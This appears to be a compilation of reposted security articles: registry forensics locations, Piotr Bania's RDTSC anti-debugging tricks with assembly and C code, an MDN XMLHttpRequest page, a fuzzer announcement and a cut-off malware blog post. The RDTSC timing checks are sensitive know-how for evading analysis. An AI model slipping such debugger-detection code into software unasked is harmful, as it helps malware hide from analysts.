In the following location you can find a list of applications registered with Windows:
HKLM\SOFTWARE\RegisteredApplications

In the following location you can find time-zone information about the system:
HKLM\System\CurrentControlSet\Control\TimeZoneInformation

In the following location you can find information about the system's network cards. Once you expand the NetworkCards tree you should see a key for each network card in the system:
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkCards

In the following location you can find information about the Internet Protocol (IP) addresses that were assigned, or are assigned, to the network interfaces:
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\NetworkList\Nla\Cache\IntranetAuth

In the following location you can find information about all the printer drivers that currently exist on the system. Forensic analysts can find information such as the Model value, which indicates the printer name and driver that was installed, and the InstallDate value, which represents the date on which the printer driver was installed:
HKLM\SYSTEM\ControlSet001\Control\Print\Printers

In the following location you can find out whether the last-access timestamp feature of NTFS is disabled or enabled. The last-access timestamp tells you when a file or folder was last accessed:
HKLM\SYSTEM\CurrentControlSet\Control\FileSystem

Look for the value NtfsDisableLastAccessUpdate. Note that the value name says "Disable": if it is set to 0, last-access updates are enabled; if it is set to 1, they are disabled.
0 = NTFS updates the last-accessed timestamp of a file whenever that file is opened.
1 = NTFS does not update the last-access timestamp of a file when that file is opened.
The results should look like the following (screenshot omitted). Windows Vista and later set this value to 1 by default, so on those systems the last-access timestamp is usually not a reliable indicator unless someone has turned updates back on. For more information about this feature, check out the NtfsDisableLastAccessUpdate article on TechNet.

Source: Windows Registry Forensics - UBERsec - When efficiency & smart cyber security collaborates together.
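The ShutdownTime value described above is a REG_BINARY holding a 64-bit FILETIME (100 ns ticks since 1601-01-01 UTC), and a service's Start value is a plain DWORD. The following is an added example written for this page, not the UBERsec LastShutDown.vbs script or any Microsoft tool, that decodes both. The eight sample bytes are constructed (they encode 2012-01-26 00:00:00 UTC); the live registry reads are compiled only on Windows and, with MinGW, need -ladvapi32.

```c
/* reg_shutdown.c: added example, not part of the UBERsec article. Decodes the two
   values the text says are hard to read by eye: ShutdownTime (a REG_BINARY holding
   a 64-bit FILETIME) and a service's Start DWORD. Decoding is portable; the live
   registry reads are Win32-only (MinGW: link with -ladvapi32). */
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#include <time.h>
#ifdef _WIN32
#  include <windows.h>
#endif

/* FILETIME counts 100 ns ticks since 1601-01-01 UTC; the Unix epoch is this many ticks in. */
#define EPOCH_DIFF_100NS 116444736000000000ULL

int64_t filetime_to_unix(uint64_t ft)
{
    return (int64_t)((ft - EPOCH_DIFF_100NS) / 10000000ULL);
}

/* regedit shows REG_BINARY as raw bytes; an 8-byte ShutdownTime is a little-endian FILETIME. */
uint64_t filetime_from_bytes(const unsigned char b[8])
{
    uint64_t v = 0;
    for (int i = 7; i >= 0; i--) v = (v << 8) | b[i];
    return v;
}

const char *service_start_name(uint32_t start)
{
    switch (start) {
    case 0: return "Boot";       /* loaded by the boot loader */
    case 1: return "System";     /* loaded during kernel initialisation */
    case 2: return "Automatic";  /* the value 2 the article refers to */
    case 3: return "Manual";
    case 4: return "Disabled";
    default: return "Unknown";
    }
}

/* Always print UTC so the timeline does not shift with the analyst's own machine settings. */
const char *format_utc(int64_t unix_secs)
{
    static char buf[32];
    time_t t = (time_t)unix_secs;
    struct tm *g = gmtime(&t);
    if (!g || !strftime(buf, sizeof buf, "%Y-%m-%d %H:%M:%S UTC", g)) strcpy(buf, "?");
    return buf;
}

#ifdef _WIN32
/* Live read from the running system; for evidence, decode an exported copy of the SYSTEM hive instead. */
int read_shutdown_time(uint64_t *ft)
{
    unsigned char raw[8];
    DWORD cb = sizeof raw;
    if (RegGetValueA(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Control\\Windows",
                     "ShutdownTime", RRF_RT_REG_BINARY, NULL, raw, &cb) != ERROR_SUCCESS || cb != 8)
        return 0;
    *ft = filetime_from_bytes(raw);
    return 1;
}

/* Walk HKLM\SYSTEM\CurrentControlSet\Services and print every service whose Start is 2. */
void list_autostart_services(void)
{
    HKEY h;
    if (RegOpenKeyExA(HKEY_LOCAL_MACHINE, "SYSTEM\\CurrentControlSet\\Services", 0, KEY_READ, &h)
        != ERROR_SUCCESS) return;
    char name[256];
    for (DWORD i = 0;; i++) {
        DWORD n = sizeof name, start = 0, cb = sizeof start;
        if (RegEnumKeyExA(h, i, name, &n, NULL, NULL, NULL, NULL) != ERROR_SUCCESS) break;
        if (RegGetValueA(h, name, "Start", RRF_RT_REG_DWORD, NULL, &start, &cb) == ERROR_SUCCESS
            && start == 2)
            printf("%-40s %s\n", name, service_start_name(start));
    }
    RegCloseKey(h);
}
#endif

int main(void)
{
    /* Constructed sample: the 8 bytes as they would appear in regedit's hex column. */
    const unsigned char sample[8] = {0x00, 0x40, 0x4F, 0x72, 0xBD, 0xDB, 0xCC, 0x01};
    printf("ShutdownTime (sample) = %s\n", format_utc(filetime_to_unix(filetime_from_bytes(sample))));
#ifdef _WIN32
    uint64_t ft;
    if (read_shutdown_time(&ft)) printf("ShutdownTime (live)   = %s\n", format_utc(filetime_to_unix(ft)));
    list_autostart_services();
#endif
    return 0;
}
```

On a non-Windows host the program only decodes the constructed sample; on Windows it also prints the live ShutdownTime and every service set to start automatically. For evidence work, feed the decoder bytes taken from an exported copy of the SYSTEM hive rather than reading the live registry, for the same reasons the article gives for NTUSER.dat.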
-
Evading network-level emulation
Piotr Bania
bania.piotr @ gmail.com
April 2009

Abstract
Recently, more and more attention has been paid to intrusion detection systems (IDS) that don't rely on a signature-based detection approach. Such solutions try to raise their defence level by using heuristic detection methods like network-level emulation. This technique allows the intrusion detection system to stop unknown threats, which normally couldn't be stopped by standard signature detection techniques. In this article the author describes the general concepts of the network-level emulation technique, including its advantages and disadvantages (weak sides), and provides potential countermeasures against this type of detection method.

Download: http://piotrbania.com/all/articles/pbania-evading-nemu2009.pdf
-
URI use and abuse
Presentation from Blackhat Europe 2008.

Download: http://www.blackhat.com/presentations/bh-europe-08/McFeters-Rios-Carter/Whitepaper/bh-eu-08-mcfeters-rios-carter-WP.pdf
-
Anti-debugging with RDTSC

-------------------------------------------------
Playing with RDTSC
-------------------------------------------------
by Piotr Bania <bania.piotr @ gmail.com>
[: www.piotrbania.com :]
All rights reserved!

Disclaimer
----------
The author takes no responsibility for any actions taken with the information or code provided. The copyright for any material created by the author is reserved. Any duplication of code or text provided here in electronic or printed publications is not permitted without the author's agreement.

Introduction
------------
In this short "article" I will present some anti-debugging tricks done using the RDTSC instruction. This article is mainly a bunch of my sick ideas, written at a very fast tempo, so sorry for the lack of references or language mistakes. So here we start with a bunch of facts:

Code:        0F 31
Mnemonic:    RDTSC
Description: Loads the current value of the processor's time-stamp counter into the EDX:EAX registers. The time-stamp counter is contained in a 64-bit MSR. The high-order 32 bits of the MSR are loaded into the EDX register, and the low-order 32 bits are loaded into the EAX register. The processor increments the time-stamp counter MSR every clock cycle and resets it to 0 whenever the processor is reset.

The time stamp disable (TSD) flag in register CR4 restricts the use of the RDTSC instruction. When the TSD flag is clear, the RDTSC instruction can be executed at any privilege level; when the flag is set, the instruction can only be executed at privilege level 0. The time-stamp counter can also be read with the RDMSR instruction, when executing at privilege level 0.

The RDTSC instruction is not a serializing instruction. Thus, it does not necessarily wait until all previous instructions have been executed before reading the counter. Similarly, subsequent instructions may begin execution before the read operation is performed. This instruction was introduced into the Intel Architecture in the Pentium processor.
Most known example
------------------
The following code tries to prevent the application from being single-stepped. It executes RDTSC twice, calculates the difference between the low-order values and checks it with a cmp. If the difference lies below 0FFFh no debugger is found; if it is above or equal, the application is being debugged (single-stepped etc.).

;------------------ SNIP -----------------------------------------
        rdtsc
        mov     ecx,eax
        rdtsc
        sub     eax,ecx
        cmp     eax,0FFFh
        jae     found_debugger_action
;------------------ SNIP -----------------------------------------

Some crazy ideas
----------------
The following tests were done under my Windows XP SP1 on an Intel Celeron 2.8 GHz - pretty overloaded. Check the following program:

;------------------ SNIP -----------------------------------------
#include <stdio.h>
#include <conio.h>
#include <windows.h>

/* MSVC inline asm: read the TSC into x (EAX, low dword) and y (EDX, high dword) */
#define RDTSC(x,y) __asm rdtsc \
                   __asm mov x,eax \
                   __asm mov y,edx

int main()
{
    DWORD a1,b1,a2,b2;
    int i;

    for (i=0; i<20; i++)
    {
        RDTSC(a1,b1);
        _lopen("././RANDOM",OF_READ);   /* the operation being timed */
        RDTSC(a2,b2);
        printf("[%.02d] cycle: EAX2-EAX1 = %.08x * EDX2-EDX1 = %.08x\n",i,(a2-a1),(b2-b1));
    }

    getch();
    return 0;
}
;------------------ SNIP -----------------------------------------

What does this program do? It simply calculates the difference between the RDTSC values taken before and after the _lopen API call.
Now check the following output:

Non traced (clear run):
----------------------
[00] cycle: EAX2-EAX1 = 000d9860 * EDX2-EDX1 = 00000000
[01] cycle: EAX2-EAX1 = 0009d768 * EDX2-EDX1 = 00000000
[02] cycle: EAX2-EAX1 = 00098bb8 * EDX2-EDX1 = 00000000
[03] cycle: EAX2-EAX1 = 00086d7c * EDX2-EDX1 = 00000000
[04] cycle: EAX2-EAX1 = 00086270 * EDX2-EDX1 = 00000000
[05] cycle: EAX2-EAX1 = 0008890c * EDX2-EDX1 = 00000000
[06] cycle: EAX2-EAX1 = 00085f98 * EDX2-EDX1 = 00000000
[07] cycle: EAX2-EAX1 = 00086fac * EDX2-EDX1 = 00000000
[08] cycle: EAX2-EAX1 = 0008771c * EDX2-EDX1 = 00000000
[09] cycle: EAX2-EAX1 = 000861ac * EDX2-EDX1 = 00000000
[10] cycle: EAX2-EAX1 = 00086cb8 * EDX2-EDX1 = 00000000
[11] cycle: EAX2-EAX1 = 000887a0 * EDX2-EDX1 = 00000000
[12] cycle: EAX2-EAX1 = 00088714 * EDX2-EDX1 = 00000000
[13] cycle: EAX2-EAX1 = 000873d4 * EDX2-EDX1 = 00000000
[14] cycle: EAX2-EAX1 = 000876ac * EDX2-EDX1 = 00000000
[15] cycle: EAX2-EAX1 = 00086484 * EDX2-EDX1 = 00000000
[16] cycle: EAX2-EAX1 = 00087e8c * EDX2-EDX1 = 00000000
[17] cycle: EAX2-EAX1 = 00088ff0 * EDX2-EDX1 = 00000000
[18] cycle: EAX2-EAX1 = 000868e4 * EDX2-EDX1 = 00000000
[19] cycle: EAX2-EAX1 = 00087f50 * EDX2-EDX1 = 00000000

Olly Trace into:
---------------
[00] cycle: EAX2-EAX1 = 00f98b50 * EDX2-EDX1 = 00000000
[01] cycle: EAX2-EAX1 = 00f23440 * EDX2-EDX1 = 00000000
[02] cycle: EAX2-EAX1 = 010a786e * EDX2-EDX1 = 00000000
[03] cycle: EAX2-EAX1 = 012233e0 * EDX2-EDX1 = 00000000
[04] cycle: EAX2-EAX1 = 00c8ed4c * EDX2-EDX1 = 00000000
[05] cycle: EAX2-EAX1 = 01014bea * EDX2-EDX1 = 00000000
[06] cycle: EAX2-EAX1 = 00d9c25c * EDX2-EDX1 = 00000000
[07] cycle: EAX2-EAX1 = 00d9d34c * EDX2-EDX1 = 00000000
[08] cycle: EAX2-EAX1 = 01f2a304 * EDX2-EDX1 = 00000001
[09] cycle: EAX2-EAX1 = 00da6e4c * EDX2-EDX1 = 00000000
[10] cycle: EAX2-EAX1 = 01593a9e * EDX2-EDX1 = 00000000
[11] cycle: EAX2-EAX1 = 01dc7ab8 * EDX2-EDX1 = 00000000
[12] cycle: EAX2-EAX1 = 00f0d75a * EDX2-EDX1 = 00000000
[13] cycle: EAX2-EAX1 = 0113998c * EDX2-EDX1 = 00000000
[14] cycle: EAX2-EAX1 = 01c7dfc8 * EDX2-EDX1 = 00000000
[15] cycle: EAX2-EAX1 = 00ddedc0 * EDX2-EDX1 = 00000000
[16] cycle: EAX2-EAX1 = 00cc2308 * EDX2-EDX1 = 00000000
[17] cycle: EAX2-EAX1 = 02318eb8 * EDX2-EDX1 = 00000000
[18] cycle: EAX2-EAX1 = 00c83ec0 * EDX2-EDX1 = 00000000
[19] cycle: EAX2-EAX1 = 02f7e078 * EDX2-EDX1 = 00000000

Olly Trace over:
---------------
[00] cycle: EAX2-EAX1 = 00683da4 * EDX2-EDX1 = 00000000
[01] cycle: EAX2-EAX1 = 0063666c * EDX2-EDX1 = 00000000
[02] cycle: EAX2-EAX1 = 006f1778 * EDX2-EDX1 = 00000000
[03] cycle: EAX2-EAX1 = 006d7618 * EDX2-EDX1 = 00000000
[04] cycle: EAX2-EAX1 = 0062c1d0 * EDX2-EDX1 = 00000000
[05] cycle: EAX2-EAX1 = 0062cca4 * EDX2-EDX1 = 00000000
[06] cycle: EAX2-EAX1 = 00787178 * EDX2-EDX1 = 00000000
[07] cycle: EAX2-EAX1 = 00628d34 * EDX2-EDX1 = 00000000
[08] cycle: EAX2-EAX1 = 00e6ab20 * EDX2-EDX1 = 00000000
[09] cycle: EAX2-EAX1 = 006daab4 * EDX2-EDX1 = 00000000
[10] cycle: EAX2-EAX1 = 00647750 * EDX2-EDX1 = 00000000
[11] cycle: EAX2-EAX1 = 008b898c * EDX2-EDX1 = 00000000
[12] cycle: EAX2-EAX1 = 006e00e4 * EDX2-EDX1 = 00000000
[13] cycle: EAX2-EAX1 = 009bc054 * EDX2-EDX1 = 00000000
[14] cycle: EAX2-EAX1 = 00634200 * EDX2-EDX1 = 00000000
[15] cycle: EAX2-EAX1 = 0074e0d8 * EDX2-EDX1 = 00000000
[16] cycle: EAX2-EAX1 = 0062f19c * EDX2-EDX1 = 00000000
[17] cycle: EAX2-EAX1 = 006404cc * EDX2-EDX1 = 00000000
[18] cycle: EAX2-EAX1 = 009db384 * EDX2-EDX1 = 00000000
[19] cycle: EAX2-EAX1 = 00629824 * EDX2-EDX1 = 00000000

Conclusions for tracing
-----------------------
As you can see, the EAX2-EAX1 difference is much bigger when the program is traced than when it is run cleanly - well, it's logical.
We will use this fact for coding some examples (code below). Now let's check single-stepping mode:

Some single stepping:
--------------------
[00] cycle: EAX2-EAX1 = c387c6c0 * EDX2-EDX1 = 00000001
[01] cycle: EAX2-EAX1 = 43d8444c * EDX2-EDX1 = 00000000
[02] cycle: EAX2-EAX1 = 465f9ffc * EDX2-EDX1 = 00000000
[03] cycle: EAX2-EAX1 = 478f50d8 * EDX2-EDX1 = 00000000
[04] cycle: EAX2-EAX1 = 46068f98 * EDX2-EDX1 = 00000000
[05] cycle: EAX2-EAX1 = 46767aac * EDX2-EDX1 = 00000000
[06] cycle: EAX2-EAX1 = 4f2e79dc * EDX2-EDX1 = 00000001
[07] cycle: EAX2-EAX1 = 4b0fc400 * EDX2-EDX1 = 00000001
[08] cycle: EAX2-EAX1 = 42835c20 * EDX2-EDX1 = 00000001
[09] cycle: EAX2-EAX1 = 47285570 * EDX2-EDX1 = 00000000
[10] cycle: EAX2-EAX1 = 45cb4330 * EDX2-EDX1 = 00000000
[11] cycle: EAX2-EAX1 = 49d9c1b8 * EDX2-EDX1 = 00000000
[12] cycle: EAX2-EAX1 = 47b0c5e0 * EDX2-EDX1 = 00000000
[13] cycle: EAX2-EAX1 = 45ccf9ac * EDX2-EDX1 = 00000000
[14] cycle: EAX2-EAX1 = 3bb0d8b4 * EDX2-EDX1 = 00000000
[15] cycle: EAX2-EAX1 = 406d1abc * EDX2-EDX1 = 00000000
[16] cycle: EAX2-EAX1 = 4b1ab80c * EDX2-EDX1 = 00000001
[17] cycle: EAX2-EAX1 = 4111b198 * EDX2-EDX1 = 00000001
[18] cycle: EAX2-EAX1 = 462c9e94 * EDX2-EDX1 = 00000001
[19] cycle: EAX2-EAX1 = 48844964 * EDX2-EDX1 = 00000000

Conclusions for single stepping
-------------------------------
- the EAX2-EAX1 difference is very high (compare with the trace output above)
- also notice that EDX2-EDX1 is sometimes 1, which is very good proof that someone is single-stepping.

Some crazy examples
-------------------
Try to play with a debugger and with breakpoints on _lopen. MAX_EAX_TIMING was calculated from the C program output some lines before this code, plus some extra range.
EXAMPLE 1
---------
;------------------ SNIP -----------------------------------------
MAX_EAX_TIMING  equ     000eeeeeh

        rdtsc
        push    eax
        push    edx
        push    OF_READ
        @pushsz "\.\\RANDOM"
        @callx  _lopen
        rdtsc
        sub     edx,dword ptr [esp]
        test    edx,edx
        jnz     found_single_step       ; or very slow processor
        sub     eax,dword ptr [esp+4]
        cmp     eax,MAX_EAX_TIMING
        jge     found_debugger_action

exit:
        push    0
        @callx  ExitProcess

found_single_step:
        @debug  "Single step action was found",0
        jmp     exit

found_debugger_action:
        @debug  "Debugger action was found",0
        jmp     exit
;------------------ SNIP -----------------------------------------

EXAMPLE 2
---------
And here is the second example, which measures the clock time of a first _lopen execution, then executes a second _lopen and measures the same thing. It then compares both results (including an extra range of 0aaaaaah, just to cover some special EAX2-EAX1 cases in clean mode - look at the tables above). If the final difference is larger than 0, we have got a bad guy on us.

;------------------ SNIP -----------------------------------------
        rdtsc
        push    eax
        push    edx
        push    OF_READ
        @pushsz "\.\\RANDOM"
        @callx  _lopen
        rdtsc
        sub     edx,dword ptr [esp]
        test    edx,edx
        jnz     found_single_step       ; or very slow processor
        sub     eax,dword ptr [esp+4]
        xchg    ebx,eax

        rdtsc
        push    eax
        push    OF_READ
        @pushsz "\.\\RANDOM"
        @callx  _lopen                  ; ---> break on this call
        rdtsc
        sub     eax,dword ptr [esp]
        add     eax,0aaaaah             ; some extra value
        sub     ebx,eax
        cmp     ebx,0
        jle     exit
        jmp     found_debugger_action

exit:
        push    0
        @callx  ExitProcess

found_single_step:
        @debug  "Single step action was found",0
        jmp     exit

found_debugger_action:
        @debug  "Debugger action was found",0
        jmp     exit
;------------------ SNIP -----------------------------------------

Source: http://piotrbania.com/all/articles/playing_with_rdtsc.txt
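As an added example, not Piotr Bania's code, the following C program re-creates the decision logic of EXAMPLE 1 so it can be exercised with fixed inputs, and shows the edge the EDX check has: it fires whenever the low dword wraps, which a clean run does roughly every 1.4 s on a 3 GHz part and which most likely explains the stray EDX2-EDX1 = 00000001 in the "Olly Trace into" table. It assumes an x86 compiler with the __rdtsc intrinsic (a POSIX clock is used on anything else) and thresholds in the same spirit as 0FFFh and MAX_EAX_TIMING; the input values fed to the classifiers are constructed.

```c
/* rdtsc_classify.c: added example, not from Piotr Bania's article. Re-creates
   the article's two checks in C so the decision logic can be exercised without
   a debugger: a changed EDX (high dword) between two reads is reported as
   single-stepping, a low-dword delta above a calibrated threshold as a debugger.
   It also shows why a full 64-bit delta is the better test. */
#include <stdint.h>
#include <stdio.h>

#if defined(_MSC_VER)
#  include <intrin.h>
#elif defined(__x86_64__) || defined(__i386__)
#  include <x86intrin.h>
#else
#  include <time.h>
#endif

/* EDX:EAX from RDTSC packed into one 64-bit value. RDTSC is not serializing, so a
   production check would use RDTSCP or an LFENCE to keep the read from being
   reordered around the workload being timed. */
static uint64_t read_tsc(void)
{
#if defined(_MSC_VER) || defined(__x86_64__) || defined(__i386__)
    return __rdtsc();
#else
    struct timespec ts;                 /* non-x86 fallback: POSIX clock (assumption) */
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000000ull + (uint64_t)ts.tv_nsec;
#endif
}

enum verdict { CLEAN = 0, DEBUGGER = 1, SINGLE_STEP = 2 };

/* EXAMPLE 1, register for register: EDX halves first, then EAX halves.
   (The article's jge is a signed compare; this uses an unsigned compare so a
   delta above 0x7FFFFFFF cannot slip through as "negative".) */
enum verdict classify_article(uint64_t before, uint64_t after, uint32_t max_eax)
{
    uint32_t edx1 = (uint32_t)(before >> 32), edx2 = (uint32_t)(after >> 32);
    uint32_t eax1 = (uint32_t)before,         eax2 = (uint32_t)after;
    if (edx2 - edx1 != 0)               /* sub edx,[esp] / test edx,edx / jnz */
        return SINGLE_STEP;
    if (eax2 - eax1 >= max_eax)         /* sub eax,[esp+4] / cmp eax,MAX_EAX_TIMING */
        return DEBUGGER;
    return CLEAN;
}

/* The EDX test really detects a low-dword wrap, which on a ~3 GHz TSC happens about
   every 1.4 s of wall time, debugger or not. The 64-bit delta has no such edge. */
uint64_t delta64(uint64_t before, uint64_t after) { return after - before; }

enum verdict classify_64(uint64_t before, uint64_t after, uint64_t max_cycles)
{
    return delta64(before, after) >= max_cycles ? DEBUGGER : CLEAN;
}

/* Times a fixed workload. The threshold must be calibrated per machine, exactly as
   MAX_EAX_TIMING was read off the article's tables; running under a hypervisor, or
   with CR4.TSD set so that RDTSC traps, moves these numbers wholesale. */
uint64_t measure_probe(void)
{
    volatile uint32_t sink = 0;
    uint64_t t0 = read_tsc();
    for (uint32_t i = 0; i < 100000; i++) sink += i ^ (sink >> 3);
    uint64_t t1 = read_tsc();
    return delta64(t0, t1);
}

int main(void)
{
    printf("probe: %llu ticks\n", (unsigned long long)measure_probe());
    /* Constructed pair of reads that straddle a low-dword wrap, only 0x200 ticks apart. */
    uint64_t a = 0x00000000FFFFFF00ull, b = 0x0000000100000100ull;
    printf("article logic says %d, 64-bit delta says %d (0 clean, 1 debugger, 2 single-step)\n",
           classify_article(a, b, 0xFFF), classify_64(a, b, 0xFFF));
    return 0;
}
```

The probe value printed first is what you would calibrate a threshold from; run it under a debugger, under a hypervisor and on bare metal before trusting any fixed constant.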
-
[h=1]HTML in XMLHttpRequest[/h]
The W3C XMLHttpRequest specification adds HTML parsing support to XMLHttpRequest, which originally supported only XML parsing. This feature allows Web apps to obtain an HTML resource as a parsed DOM using XMLHttpRequest.

[h=3]Limitations[/h]
To discourage the synchronous use of XMLHttpRequest, HTML support is not available in the synchronous mode. Also, HTML support is only available if the responseType property has been set to "document". This limitation avoids wasting time parsing HTML uselessly when legacy code uses XMLHttpRequest in the default mode to retrieve responseText for text/html resources. Also, this limitation avoids problems with legacy code that assumes that responseXML is null for HTTP error pages (which often have a text/html response body).

[h=3]Usage[/h]
Retrieving an HTML resource as a DOM using XMLHttpRequest works just like retrieving an XML resource as a DOM using XMLHttpRequest, except you can't use the synchronous mode and you have to explicitly request a document by assigning the string "document" to the responseType property of the XMLHttpRequest object after calling open() but before calling send().

var xhr = new XMLHttpRequest();
xhr.onload = function() {
  alert(this.responseXML.title);
}
xhr.open("GET", "file.html");
xhr.responseType = "document";
xhr.send();

[h=3]Feature Detection[/h]
There are two challenges to detecting if a browser supports HTML parsing in XMLHttpRequest. First, the detection result is obtained asynchronously, because HTML support is only available in the asynchronous mode. Second, you have to actually fetch a test document over HTTP, because testing with a data: URL would end up testing data: URL support instead. Thus, to detect HTML support, a test HTML file is needed on the server.
This test file is small and is not well-formed XML:

<title>&&<</title>

If the file is named detect.html, the following function can be used for detecting HTML parsing support:

function detectHtmlInXhr(callback) {
  if (!window.XMLHttpRequest) {
    window.setTimeout(function() { callback(false); }, 0);
    return;
  }
  var done = false;
  var xhr = new window.XMLHttpRequest();
  xhr.onreadystatechange = function() {
    if (this.readyState == 4 && !done) {
      done = true;
      callback(!!(this.responseXML && this.responseXML.title && this.responseXML.title == "&&<"));
    }
  }
  xhr.onabort = xhr.onerror = function() {
    if (!done) {
      done = true;
      callback(false);
    }
  }
  try {
    xhr.open("GET", "detect.html");
    xhr.responseType = "document";
    xhr.send();
  } catch (e) {
    window.setTimeout(function() {
      if (!done) {
        done = true;
        callback(false);
      }
    }, 0);
  }
}

The argument callback is a function that will be called asynchronously with true as the only argument if HTML parsing is supported and false as the only argument if HTML parsing is not supported.

[h=3]Character Encoding[/h]
If the character encoding is declared in the HTTP Content-Type header, that character encoding is used. Failing that, if there is a byte order mark, the encoding indicated by the byte order mark is used. Failing that, if there is a meta tag that declares the encoding within the first 1024 bytes of the file, that encoding is used. Otherwise, the file is decoded as UTF-8.

Source: https://developer.mozilla.org/en/HTML_in_XMLHttpRequest
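The encoding rule above is short to state but easy to get subtly wrong, because the meta lookup is bounded at 1024 bytes and the header always wins. The following is an added example, not code from the MDN page or from any browser engine, that implements the four-step precedence in C and runs it over constructed responses. It is a simplified model of the HTML prescan: no full attribute parsing and no http-equiv handling, and the label it returns is the declared name lower-cased rather than a canonical encoding name.

```c
/* xhr_charset.c: added example, not code from the MDN page. Implements, in the
   order the page states, how a text/html XHR response with responseType
   "document" gets its character encoding: Content-Type charset, then BOM, then a
   <meta> charset found within the first 1024 bytes, otherwise UTF-8. Simplified
   model of the HTML prescan: shows the precedence and the 1024-byte window only. */
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define PRESCAN_LIMIT 1024

/* Case-insensitive search for needle within the first n bytes of hay (binary safe). */
static const char *find_ci(const char *hay, size_t n, const char *needle)
{
    size_t m = strlen(needle);
    if (m == 0 || n < m) return NULL;
    for (size_t i = 0; i + m <= n; i++) {
        size_t j = 0;
        while (j < m && tolower((unsigned char)hay[i + j]) == tolower((unsigned char)needle[j])) j++;
        if (j == m) return hay + i;
    }
    return NULL;
}

/* Copy the label after "charset=" into out, lower-cased, quotes stripped, stopping at a delimiter. */
static int read_label(const char *p, const char *end, char *out, size_t outlen)
{
    size_t k = 0;
    p += strlen("charset=");
    while (p < end && (*p == '"' || *p == '\'' || *p == ' ')) p++;
    while (p < end && k + 1 < outlen && *p && !strchr(";\"' >/", *p))
        out[k++] = (char)tolower((unsigned char)*p++);
    out[k] = '\0';
    return k > 0;
}

/* Step 1: the charset parameter of the HTTP Content-Type header. */
int charset_from_content_type(const char *ct, char *out, size_t outlen)
{
    if (!ct) return 0;
    const char *p = find_ci(ct, strlen(ct), "charset=");
    return p ? read_label(p, ct + strlen(ct), out, outlen) : 0;
}

/* Step 2: a byte order mark at the very start of the body. */
int charset_from_bom(const unsigned char *b, size_t n, char *out, size_t outlen)
{
    const char *enc = NULL;
    if (n >= 3 && b[0] == 0xEF && b[1] == 0xBB && b[2] == 0xBF) enc = "utf-8";
    else if (n >= 2 && b[0] == 0xFF && b[1] == 0xFE) enc = "utf-16le";
    else if (n >= 2 && b[0] == 0xFE && b[1] == 0xFF) enc = "utf-16be";
    if (!enc) return 0;
    snprintf(out, outlen, "%s", enc);
    return 1;
}

/* Step 3: a <meta ... charset=...> tag, but only one that starts within PRESCAN_LIMIT bytes. */
int charset_from_meta(const unsigned char *b, size_t n, char *out, size_t outlen)
{
    size_t limit = n < PRESCAN_LIMIT ? n : PRESCAN_LIMIT;
    const char *s = (const char *)b, *p = s;
    while ((p = find_ci(p, limit - (size_t)(p - s), "<meta")) != NULL) {
        const char *gt  = memchr(p, '>', limit - (size_t)(p - s));
        const char *end = gt ? gt : s + limit;
        const char *cs  = find_ci(p, (size_t)(end - p), "charset=");
        if (cs && read_label(cs, end, out, outlen)) return 1;
        p += strlen("<meta");
    }
    return 0;
}

/* The whole precedence chain; always yields a label (step 4 is the utf-8 default). */
const char *sniff_encoding(const char *ct, const unsigned char *body, size_t n, char *out, size_t outlen)
{
    if (charset_from_content_type(ct, out, outlen)) return out;
    if (charset_from_bom(body, n, out, outlen)) return out;
    if (charset_from_meta(body, n, out, outlen)) return out;
    snprintf(out, outlen, "utf-8");
    return out;
}

/* String-only convenience wrapper (shared static buffer: fine for a demo, not for threads). */
const char *sniff(const char *ct, const char *body)
{
    static char buf[32];
    return sniff_encoding(ct, (const unsigned char *)body, strlen(body), buf, sizeof buf);
}

/* A well-formed <meta> that sits past byte 1024 is ignored, exactly as the page says. */
const char *late_meta_example(void)
{
    static char body[1200];
    memset(body, ' ', sizeof body - 1);
    body[sizeof body - 1] = '\0';
    memcpy(body + 1100, "<meta charset=\"iso-8859-2\">", 27);
    return sniff("text/html", body);
}

int main(void)
{
    /* Constructed responses, not captured traffic. */
    printf("header wins : %s\n", sniff("text/html; charset=ISO-8859-1", "<meta charset=windows-1250>"));
    printf("BOM wins    : %s\n", sniff("text/html", "\xEF\xBB\xBF<meta charset=latin1>"));
    printf("meta early  : %s\n", sniff("text/html", "<html><head><meta charset=windows-1250><title>x</title>"));
    printf("meta late   : %s\n", late_meta_example());
    return 0;
}
```

The fourth case is the one worth remembering when a page is served without a charset header: a meta declaration pushed past the first kilobyte by comments or inline scripts is silently ignored and the document is decoded as UTF-8.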
-
UniOFuzz 0.1.2-beta - Universal fuzzing tool released

UniOFuzz version 0.1.2-beta, the universal fuzzing tool for browsers, web services, files, programs and network services/ports, has been released by the nullsecurity team.

pigtail23, the developer of UniOFuzz, demonstrates the tool in a video (not included here).

Download UniOFuzz

Source: UniOFuzz 0.1.2-beta - Universal fuzzing tool Released | The Hacker News (THN)
-
[h=1]Virus infects worm by mistake[/h]
24 January 2012

New malware morphs into different shapes unattended by humans

Ten years ago, there was a clear-cut distinction between Trojans, viruses and worms. They all had their own features specific to one family of malware only. As more people connected to the internet, cyber-criminals started mixing ingredients to maximize impact. And here I'm thinking Trojans with worm capabilities or viruses with Trojan features, and so on. Now, another "practice" has silently emerged: the file infector that accidentally parasites another e-threat.

A virus infects executable files; and a worm is an executable file. If the virus reaches a PC already compromised by a worm, the virus will infect the exe files on that PC - including the worm. When the worm spreads, it will carry the virus with it. Although this happens unintentionally, the combined features from both pieces of malware will inflict a lot more damage than the creators of either piece of malware intended.

While most file infectors have inbuilt spreading mechanisms, just like Trojans and worms (spreading routines for RDP, USB, P2P, chat applications, or social networks), some cannot replicate or spread between computers. And it seems a great idea to "outsource" the transportation mechanism to a different piece of malware (i.e. by piggybacking a worm). Most likely these Frankenmalware, or "malware sandwiches," take place spontaneously. The virus actually infects by mistake another piece of malware and ends up using its capabilities to spread.

Bitdefender's Antimalware Lab identified no less than 40,000 such malware symbioses out of a sample pool of 10 million files. One such case is the Virtob file infector, whose malicious code has been found infecting worms like OnlineGames, the ancient Mydoom or the more advanced Bifrose backdoor Trojan. From the numerous samples of worms infected by viruses, we picked out the Win32.Worm.Rimecud - Win32.Virtob pair.

A few words about Win32.Worm.Rimecud

